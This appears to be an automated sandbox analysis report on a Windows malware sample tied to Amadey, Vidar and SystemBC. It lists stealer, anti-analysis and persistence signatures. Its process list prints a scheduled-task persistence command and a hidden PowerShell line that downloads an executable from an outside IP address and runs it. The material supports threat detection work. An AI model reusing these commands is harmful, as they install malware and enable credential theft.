Analysis Overview
SHA256
ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9
Threat Level: Known bad
The file ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9 was found to be: Known bad.
Malicious Activity Summary
Amadey
SystemBC
Vidar family
Vidar
Litehttp family
LiteHTTP
Amadey family
Detect Vidar Stealer
Systembc family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Boot or Logon Autostart Execution: Active Setup
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Identifies Wine through registry keys
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Loads dropped DLL
Drops startup file
Checks computer location settings
Reads user/profile data of local email clients
.NET Reactor protector
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Checks BIOS information in registry
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 00:12
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 00:12
Reported
2025-03-06 00:14
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\172cf80232.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\172cf80232.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\1RTut7w2\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| N/A | N/A | C:\ProgramData\xadikea\lgcr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2120 set thread context of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe |
| PID 2068 set thread context of 2828 | N/A | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe |
| PID 2148 set thread context of 1744 | N/A | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe |
| PID 2252 set thread context of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2500 set thread context of 2976 | N/A | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\xadikea\lgcr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe
"C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn y96vImaIzNT /tr "mshta C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn y96vImaIzNT /tr "mshta C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE
